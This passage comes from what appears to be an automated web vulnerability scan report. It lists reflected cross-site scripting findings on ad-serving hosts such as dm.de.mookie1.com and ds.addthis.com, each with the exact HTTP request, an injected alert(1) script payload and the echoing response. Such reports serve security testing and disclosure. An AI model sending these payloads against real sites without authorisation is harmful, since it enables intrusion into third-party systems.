...[SNIP]...

3.168. http://dm.de.mookie1.com/2/B3DM/2010DM/12086108130@x23 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/12086108130@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8d4f"><script>alert(1)</script>91bcd1e71d8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/12086108130@x23a8d4f"><script>alert(1)</script>91bcd1e71d8?USNetwork/Dominos_11Q2_247_CPC_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242619

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:06:37 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1086585598/x23a8d4f"><script>alert(1)</script>91bcd1e71d8/default/empty.gif/726348573830327254356f4142562f46?x" target="_top"><
...[SNIP]...

3.169. http://dm.de.mookie1.com/2/B3DM/2010DM/12086108130@x23 [USNetwork/Dominos_11Q2_247_CPC_728 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/12086108130@x23

Issue detail

The value of the USNetwork/Dominos_11Q2_247_CPC_728 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79e43"-alert(1)-"2c71c5674a2 was submitted in the USNetwork/Dominos_11Q2_247_CPC_728 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/12086108130@x23?USNetwork/Dominos_11Q2_247_CPC_72879e43"-alert(1)-"2c71c5674a2 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242619

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:06:31 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2438
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/Dominos_11Q2_247_CPC_72879e43"-alert(1)-"2c71c5674a2";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to ch
...[SNIP]...

3.170. http://dm.de.mookie1.com/2/B3DM/2010DM/12086108130@x23 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/12086108130@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b86c4"-alert(1)-"968eecc14d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/12086108130@x23?USNetwork/Dominos_11Q2_247_CPC_728&b86c4"-alert(1)-"968eecc14d7=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242619

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:06:32 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2441
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/Dominos_11Q2_247_CPC_728&b86c4"-alert(1)-"968eecc14d7=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to
...[SNIP]...

3.171. http://dm.de.mookie1.com/2/B3DM/2010DM/1377241392@x23 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1377241392@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6939f"><script>alert(1)</script>d229212c062 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM6939f"><script>alert(1)</script>d229212c062/2010DM/1377241392@x23?USNetwork/Dominos_11Q2_247_CPC_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:04:28 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM6939f"><script>alert(1)</script>d229212c062/2010DM/563051834/x23/default/empty.gif/726348573830327254356f4142562f46?x" target="_top"><I
...[SNIP]...

3.172. http://dm.de.mookie1.com/2/B3DM/2010DM/1377241392@x23 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1377241392@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7757"><script>alert(1)</script>67578923dc4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMd7757"><script>alert(1)</script>67578923dc4/1377241392@x23?USNetwork/Dominos_11Q2_247_CPC_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:04:30 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMd7757"><script>alert(1)</script>67578923dc4/1694518381/x23/default/empty.gif/726348573830327254356f4142562f46?x" target="_top"><
...[SNIP]...

3.173. http://dm.de.mookie1.com/2/B3DM/2010DM/1377241392@x23 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1377241392@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db149"><script>alert(1)</script>45420a5298d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/1377241392@x23db149"><script>alert(1)</script>45420a5298d?USNetwork/Dominos_11Q2_247_CPC_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:04:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 325
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/783297670/x23db149"><script>alert(1)</script>45420a5298d/default/empty.gif/726348573830327254356f4142562f46?x" target="_top"><I
...[SNIP]...

3.174. http://dm.de.mookie1.com/2/B3DM/2010DM/1377241392@x23 [USNetwork/Dominos_11Q2_247_CPC_728 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1377241392@x23

Issue detail

The value of the USNetwork/Dominos_11Q2_247_CPC_728 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bcfc"-alert(1)-"38d19f0405 was submitted in the USNetwork/Dominos_11Q2_247_CPC_728 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/1377241392@x23?USNetwork/Dominos_11Q2_247_CPC_7287bcfc"-alert(1)-"38d19f0405 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:04:27 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2437
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/Dominos_11Q2_247_CPC_7287bcfc"-alert(1)-"38d19f0405";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to ch
...[SNIP]...

3.175. http://dm.de.mookie1.com/2/B3DM/2010DM/1377241392@x23 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1377241392@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5bee7"-alert(1)-"d96185b3a49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/1377241392@x23?USNetwork/Dominos_11Q2_247_CPC_728&5bee7"-alert(1)-"d96185b3a49=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:04:27 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2441
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/Dominos_11Q2_247_CPC_728&5bee7"-alert(1)-"d96185b3a49=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to
...[SNIP]...

3.176. http://dm.de.mookie1.com/2/B3DM/2010DM/1548248067@x23 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1548248067@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37a88"><script>alert(1)</script>4134ea3c517 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM37a88"><script>alert(1)</script>4134ea3c517/2010DM/1548248067@x23?USNetwork/Dominos_11Q2_247_CPC_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:03:45 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM37a88"><script>alert(1)</script>4134ea3c517/2010DM/818904836/x23/default/empty.gif/726348573830327254356f4142562f46?x" target="_top"><I
...[SNIP]...

3.177. http://dm.de.mookie1.com/2/B3DM/2010DM/1548248067@x23 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1548248067@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bb87"><script>alert(1)</script>cb041db047f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM1bb87"><script>alert(1)</script>cb041db047f/1548248067@x23?USNetwork/Dominos_11Q2_247_CPC_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:03:47 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM1bb87"><script>alert(1)</script>cb041db047f/1515177406/x23/default/empty.gif/726348573830327254356f4142562f46?x" target="_top"><
...[SNIP]...

3.178. http://dm.de.mookie1.com/2/B3DM/2010DM/1548248067@x23 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1548248067@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec8df"><script>alert(1)</script>c890c99deb6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/1548248067@x23ec8df"><script>alert(1)</script>c890c99deb6?USNetwork/Dominos_11Q2_247_CPC_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:03:49 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 325
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/120922881/x23ec8df"><script>alert(1)</script>c890c99deb6/default/empty.gif/726348573830327254356f4142562f46?x" target="_top"><I
...[SNIP]...

3.179. http://dm.de.mookie1.com/2/B3DM/2010DM/1548248067@x23 [USNetwork/Dominos_11Q2_247_CPC_728 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1548248067@x23

Issue detail

The value of the USNetwork/Dominos_11Q2_247_CPC_728 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12f5f"-alert(1)-"2e2171ccfc5 was submitted in the USNetwork/Dominos_11Q2_247_CPC_728 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/1548248067@x23?USNetwork/Dominos_11Q2_247_CPC_72812f5f"-alert(1)-"2e2171ccfc5 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:03:44 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2438
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/;httponly

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/Dominos_11Q2_247_CPC_72812f5f"-alert(1)-"2e2171ccfc5";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to ch
...[SNIP]...

3.180. http://dm.de.mookie1.com/2/B3DM/2010DM/1548248067@x23 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1548248067@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b5c1"-alert(1)-"8ce35333fa2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/1548248067@x23?USNetwork/Dominos_11Q2_247_CPC_728&1b5c1"-alert(1)-"8ce35333fa2=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:03:44 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2441
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660;path=/;httponly

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/Dominos_11Q2_247_CPC_728&1b5c1"-alert(1)-"8ce35333fa2=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to
...[SNIP]...

3.181. http://ds.addthis.com/red/psi/sites/www.manta.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.manta.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload e5ae4<script>alert(1)</script>e6a6ac44971 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.manta.com/p.json?callback=_ate.ad.hpre5ae4<script>alert(1)</script>e6a6ac44971&uid=4d5af32c71c2e1a5&url=http%3A%2F%2Fwww.manta.com%2Fc%2Fmtl07lp%2Findustrial-waste-recovery-llc&w1bilb HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh32.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
